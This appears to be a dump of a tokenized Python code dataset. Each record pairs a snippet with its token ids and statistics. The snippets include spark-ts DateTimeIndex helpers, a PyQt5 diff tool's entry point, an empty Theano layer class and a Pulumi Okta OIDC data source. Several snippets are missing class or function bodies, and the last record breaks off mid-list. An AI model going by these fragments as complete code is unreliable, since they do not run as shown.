(nanos from epoch), or Pandas Timestamp end : string, long (nanos from epoch), or Pandas Timestamp periods : int freq : a frequency object sc : SparkContext """ dtmodule = sc._jvm.com.cloudera.sparkts.__getattr__('DateTimeIndex$').__getattr__('MODULE$') if freq is None: raise ValueError("Missing frequency") elif end is None and periods == None: raise ValueError("Need an end date or number of periods") elif end is not None: return DateTimeIndex(dtmodule.uniformFromInterval( \ datetime_to_nanos(start), datetime_to_nanos(end), freq._jfreq)) else: return DateTimeIndex(dtmodule.uniform( \ datetime_to_nanos(start), periods, freq._jfreq)) def irregular(timestamps, sc): """ Instantiates an irregular DateTimeIndex. Parameters ---------- timestamps : a Pandas DateTimeIndex, or an array of strings, longs (nanos from epoch), Pandas Timestamps sc : SparkContext """ dtmodule = sc._jvm.com.cloudera.sparkts.__getattr__('DateTimeIndex$').__getattr__('MODULE$') arr = sc._gateway.new_array(sc._jvm.long, len(timestamps)) for i in xrange(len(timestamps)): arr[i] = datetime_to_nanos(timestamps[i]) return DateTimeIndex(dtmodule.irregular(arr))
[ 6738, 12972, 19, 73, 13, 12355, 62, 10494, 1014, 1330, 20129, 62, 11748, 198, 6738, 764, 26791, 1330, 4818, 8079, 62, 1462, 62, 12647, 418, 198, 11748, 299, 32152, 355, 45941, 198, 11748, 19798, 292, 355, 279, 67, 198, 198, 4871, 7536, 7575, 15732, 7, 15252, 2599, 198, 220, 220, 220, 37227, 198, 220, 220, 220, 317, 7536, 7575, 15732, 16047, 257, 3182, 12, 37295, 282, 16855, 1022, 37014, 290, 281, 6149, 4947, 286, 198, 220, 220, 220, 3128, 12, 22355, 13, 20401, 3128, 12, 22355, 743, 6053, 284, 262, 976, 18253, 11, 30253, 3294, 8405, 198, 220, 220, 220, 379, 262, 976, 3128, 12, 2435, 13, 628, 220, 220, 220, 1675, 3368, 10802, 1022, 262, 3616, 286, 366, 9630, 1, 355, 340, 3568, 287, 366, 10430, 7575, 15732, 1, 290, 366, 9630, 1, 198, 220, 220, 220, 355, 257, 4067, 287, 281, 7177, 11, 287, 262, 4732, 286, 428, 1398, 11, 356, 779, 366, 24886, 1600, 393, 366, 17946, 1600, 284, 3522, 198, 220, 220, 220, 284, 262, 6846, 13, 198, 220, 220, 220, 37227, 220, 628, 220, 220, 220, 825, 11593, 11925, 834, 7, 944, 2599, 198, 220, 220, 220, 220, 220, 220, 220, 37227, 35561, 262, 1271, 286, 4628, 395, 9430, 3017, 287, 262, 6376, 526, 15931, 198, 220, 220, 220, 220, 220, 220, 220, 1441, 2116, 13557, 73, 28664, 62, 9630, 13, 7857, 3419, 628, 220, 220, 220, 825, 4808, 89, 28664, 62, 1462, 62, 12647, 418, 7, 944, 11, 1976, 28664, 2599, 198, 220, 220, 220, 220, 220, 220, 220, 37227, 11627, 974, 82, 15709, 577, 17561, 82, 422, 257, 1168, 12004, 10430, 7575, 37811, 198, 220, 220, 220, 220, 220, 220, 220, 9113, 796, 1976, 28664, 13, 1462, 49933, 3419, 198, 220, 220, 220, 220, 220, 220, 220, 1441, 9113, 13, 1136, 45, 5733, 3419, 1343, 9113, 13, 1136, 13807, 5374, 12211, 3419, 1635, 1802, 24598, 628, 220, 220, 220, 825, 717, 7, 944, 2599, 198, 220, 220, 220, 220, 220, 220, 220, 37227, 35561, 262, 14555, 41033, 287, 262, 6376, 11, 355, 257, 16492, 292, 5045, 27823, 526, 15931, 198, 220, 220, 220, 220, 220, 220, 220, 1441, 279, 67, 13, 14967, 27823, 7, 944, 13557, 89, 28664, 62, 1462, 62, 12647, 418, 7, 944, 13557, 73, 28664, 62, 9630, 13, 11085, 3419, 4008, 628, 220, 220, 220, 825, 938, 7, 944, 2599, 198, 220, 220, 220, 220, 220, 220, 220, 37227, 35561, 262, 3452, 41033, 287, 262, 6376, 11, 355, 257, 16492, 292, 5045, 27823, 526, 15931, 198, 220, 220, 220, 220, 220, 220, 220, 1441, 279, 67, 13, 14967, 27823, 7, 944, 13557, 89, 28664, 62, 1462, 62, 12647, 418, 7, 944, 13557, 73, 28664, 62, 9630, 13, 12957, 3419, 4008, 198, 220, 220, 220, 220, 198, 220, 220, 220, 825, 4818, 8079, 62, 265, 62, 17946, 7, 944, 11, 1179, 2599, 198, 220, 220, 220, 220, 220, 220, 220, 37227, 35561, 262, 41033, 379, 262, 1813, 18253, 4067, 355, 257, 16492, 292, 5045, 27823, 526, 15931, 198, 220, 220, 220, 220, 220, 220, 220, 1441, 279, 67, 13, 14967, 27823, 7, 944, 13557, 89, 28664, 62, 1462, 62, 12647, 418, 7, 944, 13557, 73, 28664, 62, 9630, 13, 4475, 7575, 2953, 33711, 7, 17946, 22305, 628, 220, 220, 220, 825, 318, 75, 501, 7, 944, 11, 923, 11, 886, 2599, 198, 220, 220, 220, 220, 220, 220, 220, 37227, 198, 220, 220, 220, 220, 220, 220, 220, 16409, 257, 649, 7536, 7575, 15732, 11, 7268, 257, 6352, 75, 501, 286, 262, 4628, 395, 9430, 287, 428, 6376, 11, 198, 220, 220, 220, 220, 220, 220, 220, 355, 7368, 416, 262, 1813, 18253, 923, 290, 886, 7064, 13, 628, 220, 220, 220, 220, 220, 220, 220, 40117, 198, 220, 220, 220, 220, 220, 220, 220, 24200, 438, 198, 220, 220, 220, 220, 220, 220, 220, 923, 1058, 493, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 383, 4067, 286, 262, 923, 286, 262, 2837, 11, 19889, 13, 198, 220, 220, 220, 220, 220, 220, 220, 886, 1058, 493, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 383, 4067, 286, 262, 886, 286, 262, 2837, 11, 8568, 13, 198, 220, 220, 220, 220, 220, 220, 220, 37227, 198, 220, 220, 220, 220, 220, 220, 220, 474, 28664, 62, 9630, 796, 2116, 13557, 73, 28664, 62, 9630, 13, 3044, 501, 7, 9688, 11, 886, 8, 198, 220, 220, 220, 220, 220, 220, 220, 1441, 7536, 7575, 15732, 7, 73, 28664, 62, 9630, 28, 73, 28664, 62, 9630, 8, 628, 220, 220, 220, 825, 284, 62, 79, 392, 292, 62, 9630, 7, 944, 2599, 198, 220, 220, 220, 220, 220, 220, 220, 37227, 35561, 257, 19798, 292, 13, 27354, 8079, 15732, 10200, 262, 976, 3128, 12, 22355, 37811, 198, 220, 220, 220, 220, 220, 220, 220, 1303, 16926, 46, 25, 356, 460, 2192, 2866, 428, 510, 329, 8187, 36525, 198, 220, 220, 220, 220, 220, 220, 220, 5240, 796, 2116, 13557, 73, 28664, 62, 9630, 13, 1462, 45, 40015, 19182, 3419, 198, 220, 220, 220, 220, 220, 220, 220, 1441, 279, 67, 13, 27354, 8079, 15732, 7, 3258, 8, 198, 198, 4871, 3596, 37, 28707, 28264, 37, 28707, 2599, 198, 220, 220, 220, 37227, 198, 220, 220, 220, 317, 8373, 326, 460, 307, 973, 329, 257, 8187, 7536, 7575, 15732, 11, 810, 262, 2278, 318, 1813, 287, 1528, 13, 198, 220, 220, 220, 37227, 198, 198, 4871, 19123, 37, 28707, 28264, 37, 28707, 2599, 198, 220, 220, 220, 37227, 198, 220, 220, 220, 317, 8373, 326, 460, 307, 973, 329, 257, 8187, 7536, 7575, 15732, 11, 810, 262, 2278, 318, 1813, 287, 2250, 13, 198, 220, 220, 220, 37227, 198, 198, 4871, 7320, 12393, 37, 28707, 7, 15252, 2599, 198, 220, 220, 220, 37227, 198, 220, 220, 220, 317, 8373, 326, 460, 307, 973, 329, 257, 8187, 7536, 7575, 15732, 11, 810, 262, 2278, 318, 1813, 287, 198, 220, 220, 220, 1597, 1528, 13, 220, 383, 717, 1110, 286, 262, 1597, 1285, 318, 7368, 810, 3321, 28, 16, 11, 3431, 28, 17, 11, 198, 220, 220, 220, 290, 523, 319, 13, 198, 220, 220, 220, 37227, 198, 198, 4299, 8187, 7, 9688, 11, 886, 28, 14202, 11, 9574, 28, 14202, 11, 2030, 80, 28, 14202, 11, 629, 28, 14202, 2599, 198, 220, 220, 220, 37227, 198, 220, 220, 220, 2262, 17096, 689, 257, 8187, 7536, 7575, 15732, 13, 628, 220, 220, 220, 15467, 886, 393, 9574, 1276, 307, 7368, 13, 198, 220, 220, 220, 220, 198, 220, 220, 220, 40117, 198, 220, 220, 220, 24200, 438, 198, 220, 220, 220, 220, 220, 220, 220, 923, 1058, 4731, 11, 890, 357, 12647, 418, 422, 36835, 828, 393, 16492, 292, 5045, 27823, 198, 220, 220, 220, 220, 220, 220, 220, 886, 1058, 4731, 11, 890, 357, 12647, 418, 422, 36835, 828, 393, 16492, 292, 5045, 27823, 198, 220, 220, 220, 220, 220, 220, 220, 9574, 1058, 493, 198, 220, 220, 220, 220, 220, 220, 220, 2030, 80, 1058, 257, 8373, 2134, 198, 220, 220, 220, 220, 220, 220, 220, 629, 1058, 17732, 21947, 198, 220, 220, 220, 37227, 198, 220, 220, 220, 288, 83, 21412, 796, 629, 13557, 73, 14761, 13, 785, 13, 565, 280, 1082, 64, 13, 2777, 668, 912, 13, 834, 1136, 35226, 834, 10786, 10430, 7575, 15732, 3, 27691, 834, 1136, 35226, 834, 10786, 33365, 24212, 3, 11537, 198, 220, 220, 220, 611, 2030, 80, 318, 6045, 25, 198, 220, 220, 220, 220, 220, 220, 220, 5298, 11052, 12331, 7203, 43730, 8373, 4943, 198, 220, 220, 220, 1288, 361, 886, 318, 6045, 290, 9574, 6624, 6045, 25, 198, 220, 220, 220, 220, 220, 220, 220, 5298, 11052, 12331, 7203, 23037, 281, 886, 3128, 393, 1271, 286, 9574, 4943, 198, 220, 220, 220, 1288, 361, 886, 318, 407, 6045, 25, 198, 220, 220, 220, 220, 220, 220, 220, 1441, 7536, 7575, 15732, 7, 28664, 21412, 13, 403, 6933, 4863, 9492, 2100, 7, 3467, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 4818, 8079, 62, 1462, 62, 12647, 418, 7, 9688, 828, 4818, 8079, 62, 1462, 62, 12647, 418, 7, 437, 828, 2030, 80, 13557, 73, 19503, 80, 4008, 198, 220, 220, 220, 2073, 25, 198, 220, 220, 220, 220, 220, 220, 220, 1441, 7536, 7575, 15732, 7, 28664, 21412, 13, 403, 6933, 7, 3467, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 4818, 8079, 62, 1462, 62, 12647, 418, 7, 9688, 828, 9574, 11, 2030, 80, 13557, 73, 19503, 80, 4008, 198, 198, 4299, 21388, 7, 16514, 395, 9430, 11, 629, 2599, 198, 220, 220, 220, 37227, 198, 220, 220, 220, 2262, 17096, 689, 281, 21388, 7536, 7575, 15732, 13, 198, 220, 220, 220, 220, 198, 220, 220, 220, 40117, 198, 220, 220, 220, 24200, 438, 198, 220, 220, 220, 220, 220, 220, 220, 4628, 395, 9430, 1058, 257, 16492, 292, 7536, 7575, 15732, 11, 393, 281, 7177, 286, 13042, 11, 890, 82, 357, 12647, 418, 422, 36835, 828, 16492, 292, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 5045, 395, 9430, 198, 220, 220, 220, 220, 220, 220, 220, 629, 1058, 17732, 21947, 198, 220, 220, 220, 37227, 198, 220, 220, 220, 288, 83, 21412, 796, 629, 13557, 73, 14761, 13, 785, 13, 565, 280, 1082, 64, 13, 2777, 668, 912, 13, 834, 1136, 35226, 834, 10786, 10430, 7575, 15732, 3, 27691, 834, 1136, 35226, 834, 10786, 33365, 24212, 3, 11537, 198, 220, 220, 220, 5240, 796, 629, 13557, 10494, 1014, 13, 3605, 62, 18747, 7, 1416, 13557, 73, 14761, 13, 6511, 11, 18896, 7, 16514, 395, 9430, 4008, 198, 220, 220, 220, 329, 1312, 287, 2124, 9521, 7, 11925, 7, 16514, 395, 9430, 8, 2599, 198, 220, 220, 220, 220, 220, 220, 220, 5240, 58, 72, 60, 796, 4818, 8079, 62, 1462, 62, 12647, 418, 7, 16514, 395, 9430, 58, 72, 12962, 198, 220, 220, 220, 1441, 7536, 7575, 15732, 7, 28664, 21412, 13, 343, 16338, 7, 3258, 4008, 628 ]
2.646562
1,658
#-*- codingg:utf8 -*- from PyQt5.QtWidgets import QMainWindow,QFontDialog, QApplication,QMenu,QAction,QFileDialog,QDockWidget,QMessageBox,QDesktopWidget,QTableWidget from PyQt5.QtGui import QIcon,QFont,QKeySequence from PyQt5.QtCore import Qt,QSettings,QThread,pyqtSignal from ViewWidget import ViewWidget from DiffWidget import RowDiffWidget,CellDiffWidget,ColDiffWidget from ChangeColorWidget import ChangeColorWidget from Model import MyXlsx from Algorithm import MyAlg import sys,math,hashlib if __name__=="__main__": app = QApplication(sys.argv) main = MainWindow() main.setWindowIcon(QIcon("icon/opennew.ico")) main.show() sys.exit(app.exec_())
[ 2, 12, 9, 12, 19617, 70, 25, 40477, 23, 532, 9, 12, 198, 6738, 9485, 48, 83, 20, 13, 48, 83, 54, 312, 11407, 1330, 1195, 13383, 27703, 11, 48, 23252, 44204, 11, 1195, 23416, 11, 48, 23381, 11, 48, 12502, 11, 48, 8979, 44204, 11, 48, 35, 735, 38300, 11, 48, 12837, 14253, 11, 48, 36881, 38300, 11, 48, 10962, 38300, 198, 6738, 9485, 48, 83, 20, 13, 48, 83, 8205, 72, 1330, 1195, 19578, 11, 48, 23252, 11, 48, 9218, 44015, 594, 198, 6738, 9485, 48, 83, 20, 13, 48, 83, 14055, 1330, 33734, 11, 48, 26232, 11, 48, 16818, 11, 9078, 39568, 11712, 282, 198, 6738, 3582, 38300, 1330, 3582, 38300, 198, 6738, 10631, 38300, 1330, 11314, 28813, 38300, 11, 28780, 28813, 38300, 11, 5216, 28813, 38300, 198, 6738, 9794, 10258, 38300, 1330, 9794, 10258, 38300, 198, 6738, 9104, 1330, 2011, 55, 7278, 87, 198, 6738, 978, 42289, 1330, 2011, 2348, 70, 198, 11748, 25064, 11, 11018, 11, 17831, 8019, 628, 198, 220, 220, 220, 220, 220, 220, 220, 220, 628, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 198, 198, 361, 11593, 3672, 834, 855, 1, 834, 12417, 834, 1298, 628, 220, 220, 220, 598, 796, 1195, 23416, 7, 17597, 13, 853, 85, 8, 198, 220, 220, 220, 1388, 796, 8774, 27703, 3419, 198, 220, 220, 220, 1388, 13, 2617, 27703, 19578, 7, 48, 19578, 7203, 4749, 14, 404, 1697, 413, 13, 3713, 48774, 198, 220, 220, 220, 1388, 13, 12860, 3419, 198, 220, 220, 220, 25064, 13, 37023, 7, 1324, 13, 18558, 62, 28955 ]
2.566787
277
import numpy as np import theano from ..utils.activation import * from ..utils import weights from .base import Layer __all__ = [ "Convolutional2DLayer" ] class Convolutional2DLayer(Layer): ''' Standard Convolutional 2D Layer ''' # -------------------- #
[ 11748, 299, 32152, 355, 45941, 198, 198, 11748, 262, 5733, 198, 198, 6738, 11485, 26791, 13, 48545, 1330, 1635, 198, 6738, 11485, 26791, 1330, 19590, 198, 6738, 764, 8692, 1330, 34398, 628, 198, 198, 834, 439, 834, 796, 685, 198, 197, 1, 3103, 85, 2122, 282, 17, 19260, 2794, 1, 198, 60, 628, 198, 198, 4871, 34872, 2122, 282, 17, 19260, 2794, 7, 49925, 2599, 198, 197, 7061, 6, 198, 197, 23615, 34872, 2122, 282, 362, 35, 34398, 198, 197, 7061, 6, 628, 628, 628, 197, 197, 198, 197, 2, 41436, 1303, 628 ]
2.978495
93
import random
[ 11748, 4738, 198 ]
4.666667
3
# coding=utf-8 # *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. *** # *** Do not edit by hand unless you're certain you know what you are doing! *** import warnings import pulumi import pulumi.runtime from typing import Any, Mapping, Optional, Sequence, Union, overload from .. import _utilities __all__ = [ 'GetOidcResult', 'AwaitableGetOidcResult', 'get_oidc', ] @pulumi.output_type class GetOidcResult: """ A collection of values returned by getOidc. """ @property @pulumi.getter(name="authorizationBinding") def authorization_binding(self) -> str: """ The method of making an authorization request. """ return pulumi.get(self, "authorization_binding") @property @pulumi.getter(name="authorizationUrl") def authorization_url(self) -> str: """ IdP Authorization Server (AS) endpoint to request consent from the user and obtain an authorization code grant. """ return pulumi.get(self, "authorization_url") @property @pulumi.getter(name="clientId") def client_id(self) -> str: """ Unique identifier issued by AS for the Okta IdP instance. """ return pulumi.get(self, "client_id") @property @pulumi.getter(name="clientSecret") def client_secret(self) -> str: """ Client secret issued by AS for the Okta IdP instance. """ return pulumi.get(self, "client_secret") @property @pulumi.getter def id(self) -> Optional[str]: """ id of idp. """ return pulumi.get(self, "id") @property @pulumi.getter(name="issuerMode") def issuer_mode(self) -> str: """ Indicates whether Okta uses the original Okta org domain URL, or a custom domain URL. """ return pulumi.get(self, "issuer_mode") @property @pulumi.getter(name="issuerUrl") def issuer_url(self) -> str: """ URI that identifies the issuer. """ return pulumi.get(self, "issuer_url") @property @pulumi.getter(name="jwksBinding") def jwks_binding(self) -> str: """ The method of making a request for the OIDC JWKS. """ return pulumi.get(self, "jwks_binding") @property @pulumi.getter(name="jwksUrl") def jwks_url(self) -> str: """ Endpoint where the keys signer publishes its keys in a JWK Set. """ return pulumi.get(self, "jwks_url") @property @pulumi.getter(name="maxClockSkew") def max_clock_skew(self) -> int: """ Maximum allowable clock-skew when processing messages from the IdP. """ return pulumi.get(self, "max_clock_skew") @property @pulumi.getter def name(self) -> Optional[str]: """ name of the idp. """ return pulumi.get(self, "name") @property @pulumi.getter(name="protocolType") def protocol_type(self) -> str: """ The type of protocol to use. """ return pulumi.get(self, "protocol_type") @property @pulumi.getter def scopes(self) -> Sequence[str]: """ The scopes of the IdP. """ return pulumi.get(self, "scopes") @property @pulumi.getter(name="tokenBinding") def token_binding(self) -> str: """ The method of making a token request. """ return pulumi.get(self, "token_binding") @property @pulumi.getter(name="tokenUrl") def token_url(self) -> str: """ IdP Authorization Server (AS) endpoint to exchange the authorization code grant for an access token. """ return pulumi.get(self, "token_url") @property @pulumi.getter def type(self) -> str: """ type of idp. """ return pulumi.get(self, "type") @property @pulumi.getter(name="userInfoBinding") def user_info_binding(self) -> str: """ The method of making a user info request. """ return pulumi.get(self, "user_info_binding") @property @pulumi.getter(name="userInfoUrl") def user_info_url(self) -> str: """ Protected resource endpoint that returns claims about the authenticated user. """ return pulumi.get(self, "user_info_url") # pylint: disable=using-constant-test def get_oidc(id: Optional[str] = None, name: Optional[str] = None, opts: Optional[pulumi.InvokeOptions] = None) -> AwaitableGetOidcResult: """ Use this data source to retrieve a OIDC IdP from Okta. ## Example Usage ```python import pulumi import pulumi_okta as okta example = okta.idp.get_oidc(name="Example Provider") ``` :param str id: The id of the idp to retrieve, conflicts with `name`. :param str name: The name of the idp to retrieve, conflicts with `id`. """ __args__ = dict() __args__['id'] = id __args__['name'] = name if opts is None: opts = pulumi.InvokeOptions() if opts.version is None: opts.version = _utilities.get_version() __ret__ = pulumi.runtime.invoke('okta:idp/getOidc:getOidc', __args__, opts=opts, typ=GetOidcResult).value return AwaitableGetOidcResult( authorization_binding=__ret__.authorization_binding, authorization_url=__ret__.authorization_url, client_id=__ret__.client_id, client_secret=__ret__.client_secret, id=__ret__.id, issuer_mode=__ret__.issuer_mode, issuer_url=__ret__.issuer_url, jwks_binding=__ret__.jwks_binding, jwks_url=__ret__.jwks_url, max_clock_skew=__ret__.max_clock_skew, name=__ret__.name, protocol_type=__ret__.protocol_type, scopes=__ret__.scopes, token_binding=__ret__.token_binding, token_url=__ret__.token_url, type=__ret__.type, user_info_binding=__ret__.user_info_binding, user_info_url=__ret__.user_info_url)
[ 2, 19617, 28, 40477, 12, 23, 198, 2, 17202, 39410, 25, 428, 2393, 373, 7560, 416, 262, 21624, 12994, 24118, 687, 10290, 357, 27110, 5235, 8, 16984, 13, 17202, 198, 2, 17202, 2141, 407, 4370, 416, 1021, 4556, 345, 821, 1728, 345, 760, 644, 345, 389, 1804, 0, 17202, 198, 198, 11748, 14601, 198, 11748, 17472, 12994, 198, 11748, 17472, 12994, 13, 43282, 198, 6738, 19720, 1330, 4377, 11, 337, 5912, 11, 32233, 11, 45835, 11, 4479, 11, 31754, 198, 6738, 11485, 1330, 4808, 315, 2410, 198, 198, 834, 439, 834, 796, 685, 198, 220, 220, 220, 705, 3855, 46, 312, 66, 23004, 3256, 198, 220, 220, 220, 705, 32, 17077, 540, 3855, 46, 312, 66, 23004, 3256, 198, 220, 220, 220, 705, 1136, 62, 1868, 66, 3256, 198, 60, 198, 198, 31, 79, 377, 12994, 13, 22915, 62, 4906, 198, 4871, 3497, 46, 312, 66, 23004, 25, 198, 220, 220, 220, 37227, 198, 220, 220, 220, 317, 4947, 286, 3815, 4504, 416, 651, 46, 312, 66, 13, 198, 220, 220, 220, 37227, 628, 220, 220, 220, 2488, 26745, 198, 220, 220, 220, 2488, 79, 377, 12994, 13, 1136, 353, 7, 3672, 2625, 9800, 1634, 33, 6020, 4943, 198, 220, 220, 220, 825, 19601, 62, 30786, 7, 944, 8, 4613, 965, 25, 198, 220, 220, 220, 220, 220, 220, 220, 37227, 198, 220, 220, 220, 220, 220, 220, 220, 383, 2446, 286, 1642, 281, 19601, 2581, 13, 198, 220, 220, 220, 220, 220, 220, 220, 37227, 198, 220, 220, 220, 220, 220, 220, 220, 1441, 17472, 12994, 13, 1136, 7, 944, 11, 366, 9800, 1634, 62, 30786, 4943, 628, 220, 220, 220, 2488, 26745, 198, 220, 220, 220, 2488, 79, 377, 12994, 13, 1136, 353, 7, 3672, 2625, 9800, 1634, 28165, 4943, 198, 220, 220, 220, 825, 19601, 62, 6371, 7, 944, 8, 4613, 965, 25, 198, 220, 220, 220, 220, 220, 220, 220, 37227, 198, 220, 220, 220, 220, 220, 220, 220, 5121, 47, 35263, 9652, 357, 1921, 8, 36123, 284, 2581, 8281, 422, 262, 2836, 290, 7330, 281, 19601, 2438, 7264, 13, 198, 220, 220, 220, 220, 220, 220, 220, 37227, 198, 220, 220, 220, 220, 220, 220, 220, 1441, 17472, 12994, 13, 1136, 7, 944, 11, 366, 9800, 1634, 62, 6371, 4943, 628, 220, 220, 220, 2488, 26745, 198, 220, 220, 220, 2488, 79, 377, 12994, 13, 1136, 353, 7, 3672, 2625, 16366, 7390, 4943, 198, 220, 220, 220, 825, 5456, 62, 312, 7, 944, 8, 4613, 965, 25, 198, 220, 220, 220, 220, 220, 220, 220, 37227, 198, 220, 220, 220, 220, 220, 220, 220, 30015, 27421, 4884, 416, 7054, 329, 262, 6762, 8326, 5121, 47, 4554, 13, 198, 220, 220, 220, 220, 220, 220, 220, 37227, 198, 220, 220, 220, 220, 220, 220, 220, 1441, 17472, 12994, 13, 1136, 7, 944, 11, 366, 16366, 62, 312, 4943, 628, 220, 220, 220, 2488, 26745, 198, 220, 220, 220, 2488, 79, 377, 12994, 13, 1136, 353, 7, 3672, 2625, 16366, 23725, 4943, 198, 220, 220, 220, 825, 5456, 62, 21078, 7, 944, 8, 4613, 965, 25, 198, 220, 220, 220, 220, 220, 220, 220, 37227, 198, 220, 220, 220, 220, 220, 220, 220, 20985, 3200, 4884, 416, 7054, 329, 262, 6762, 8326, 5121, 47, 4554, 13, 198, 220, 220, 220, 220, 220, 220, 220, 37227, 198, 220, 220, 220, 220, 220, 220, 220, 1441, 17472, 12994, 13, 1136, 7, 944, 11, 366, 16366, 62, 21078, 4943, 628, 220, 220, 220, 2488, 26745, 198, 220, 220, 220, 2488, 79, 377, 12994, 13, 1136, 353, 198, 220, 220, 220, 825, 4686, 7, 944, 8, 4613, 32233, 58, 2536, 5974, 198, 220, 220, 220, 220, 220, 220, 220, 37227, 198, 220, 220, 220, 220, 220, 220, 220, 4686, 286, 4686, 79, 13, 198, 220, 220, 220, 220, 220, 220, 220, 37227, 198, 220, 220, 220, 220, 220, 220, 220, 1441, 17472, 12994, 13, 1136, 7, 944, 11, 366, 312, 4943, 628, 220, 220, 220, 2488, 26745, 198, 220, 220, 220, 2488, 79, 377, 12994, 13, 1136, 353, 7, 3672, 2625, 747, 15573, 19076, 4943, 198, 220, 220, 220, 825, 44168, 62, 14171, 7, 944, 8, 4613, 965, 25, 198, 220, 220, 220, 220, 220, 220, 220, 37227, 198, 220, 220, 220, 220, 220, 220, 220, 1423, 16856, 1771, 6762, 8326, 3544, 262, 2656, 6762, 8326, 8745, 7386, 10289, 11, 393, 257, 2183, 7386, 10289, 13, 198, 220, 220, 220, 220, 220, 220, 220, 37227, 198, 220, 220, 220, 220, 220, 220, 220, 1441, 17472, 12994, 13, 1136, 7, 944, 11, 366, 747, 15573, 62, 14171, 4943, 628, 220, 220, 220, 2488, 26745, 198, 220, 220, 220, 2488, 79, 377, 12994, 13, 1136, 353, 7, 3672, 2625, 747, 15573, 28165, 4943, 198, 220, 220, 220, 825, 44168, 62, 6371, 7, 944, 8, 4613, 965, 25, 198, 220, 220, 220, 220, 220, 220, 220, 37227, 198, 220, 220, 220, 220, 220, 220, 220, 43975, 326, 21079, 262, 44168, 13, 198, 220, 220, 220, 220, 220, 220, 220, 37227, 198, 220, 220, 220, 220, 220, 220, 220, 1441, 17472, 12994, 13, 1136, 7, 944, 11, 366, 747, 15573, 62, 6371, 4943, 628, 220, 220, 220, 2488, 26745, 198, 220, 220, 220, 2488, 79, 377, 12994, 13, 1136, 353, 7, 3672, 2625, 73, 86, 591, 33, 6020, 4943, 198, 220, 220, 220, 825, 474, 86, 591, 62, 30786, 7, 944, 8, 4613, 965, 25, 198, 220, 220, 220, 220, 220, 220, 220, 37227, 198, 220, 220, 220, 220, 220, 220, 220, 383, 2446, 286, 1642, 257, 2581, 329, 262, 440, 2389, 34, 449, 54, 27015, 13, 198, 220, 220, 220, 220, 220, 220, 220, 37227, 198, 220, 220, 220, 220, 220, 220, 220, 1441, 17472, 12994, 13, 1136, 7, 944, 11, 366, 73, 86, 591, 62, 30786, 4943, 628, 220, 220, 220, 2488, 26745, 198, 220, 220, 220, 2488, 79, 377, 12994, 13, 1136, 353, 7, 3672, 2625, 73, 86, 591, 28165, 4943, 198, 220, 220, 220, 825, 474, 86, 591, 62, 6371, 7, 944, 8, 4613, 965, 25, 198, 220, 220, 220, 220, 220, 220, 220, 37227, 198, 220, 220, 220, 220, 220, 220, 220, 5268, 4122, 810, 262, 8251, 1051, 263, 34134, 663, 8251, 287, 257, 449, 54, 42, 5345, 13, 198, 220, 220, 220, 220, 220, 220, 220, 37227, 198, 220, 220, 220, 220, 220, 220, 220, 1441, 17472, 12994, 13, 1136, 7, 944, 11, 366, 73, 86, 591, 62, 6371, 4943, 628, 220, 220, 220, 2488, 26745, 198, 220, 220, 220, 2488, 79, 377, 12994, 13, 1136, 353, 7, 3672, 2625, 9806, 44758, 50, 365, 86, 4943, 198, 220, 220, 220, 825, 3509, 62, 15750, 62, 82, 365, 86, 7, 944, 8, 4613, 493, 25, 198, 220, 220, 220, 220, 220, 220, 220, 37227, 198, 220, 220, 220, 220, 220, 220, 220, 22246, 49299, 8801, 12, 82, 365, 86, 618, 7587, 6218, 422, 262, 5121, 47, 13, 198, 220, 220, 220, 220, 220, 220, 220, 37227, 198, 220, 220, 220, 220, 220, 220, 220, 1441, 17472, 12994, 13, 1136, 7, 944, 11, 366, 9806, 62, 15750, 62, 82, 365, 86, 4943, 628, 220, 220, 220, 2488, 26745, 198, 220, 220, 220, 2488, 79, 377, 12994, 13, 1136, 353, 198, 220, 220, 220, 825, 1438, 7, 944, 8, 4613, 32233, 58, 2536, 5974, 198, 220, 220, 220, 220, 220, 220, 220, 37227, 198, 220, 220, 220, 220, 220, 220, 220, 1438, 286, 262, 4686, 79, 13, 198, 220, 220, 220, 220, 220, 220, 220, 37227, 198, 220, 220, 220, 220, 220, 220, 220, 1441, 17472, 12994, 13, 1136, 7, 944, 11, 366, 3672, 4943, 628, 220, 220, 220, 2488, 26745, 198, 220, 220, 220, 2488, 79, 377, 12994, 13, 1136, 353, 7, 3672, 2625, 11235, 4668, 6030, 4943, 198, 220, 220, 220, 825, 8435, 62, 4906, 7, 944, 8, 4613, 965, 25, 198, 220, 220, 220, 220, 220, 220, 220, 37227, 198, 220, 220, 220, 220, 220, 220, 220, 383, 2099, 286, 8435, 284, 779, 13, 198, 220, 220, 220, 220, 220, 220, 220, 37227, 198, 220, 220, 220, 220, 220, 220, 220, 1441, 17472, 12994, 13, 1136, 7, 944, 11, 366, 11235, 4668, 62, 4906, 4943, 628, 220, 220, 220, 2488, 26745, 198, 220, 220, 220, 2488, 79, 377, 12994, 13, 1136, 353, 198, 220, 220, 220, 825, 629, 13920, 7, 944, 8, 4613, 45835, 58, 2536, 5974, 198, 220, 220, 220, 220, 220, 220, 220, 37227, 198, 220, 220, 220, 220, 220, 220, 220, 383, 629, 13920, 286, 262, 5121, 47, 13, 198, 220, 220, 220, 220, 220, 220, 220, 37227, 198, 220, 220, 220, 220, 220, 220, 220, 1441, 17472, 12994, 13, 1136, 7, 944, 11, 366, 1416, 13920, 4943, 628, 220, 220, 220, 2488, 26745, 198, 220, 220, 220, 2488, 79, 377, 12994, 13, 1136, 353, 7, 3672, 2625, 30001, 33, 6020, 4943, 198, 220, 220, 220, 825, 11241, 62, 30786, 7, 944, 8, 4613, 965, 25, 198, 220, 220, 220, 220, 220, 220, 220, 37227, 198, 220, 220, 220, 220, 220, 220, 220, 383, 2446, 286, 1642, 257, 11241, 2581, 13, 198, 220, 220, 220, 220, 220, 220, 220, 37227, 198, 220, 220, 220, 220, 220, 220, 220, 1441, 17472, 12994, 13, 1136, 7, 944, 11, 366, 30001, 62, 30786, 4943, 628, 220, 220, 220, 2488, 26745, 198, 220, 220, 220, 2488, 79, 377, 12994, 13, 1136, 353, 7, 3672, 2625, 30001, 28165, 4943, 198, 220, 220, 220, 825, 11241, 62, 6371, 7, 944, 8, 4613, 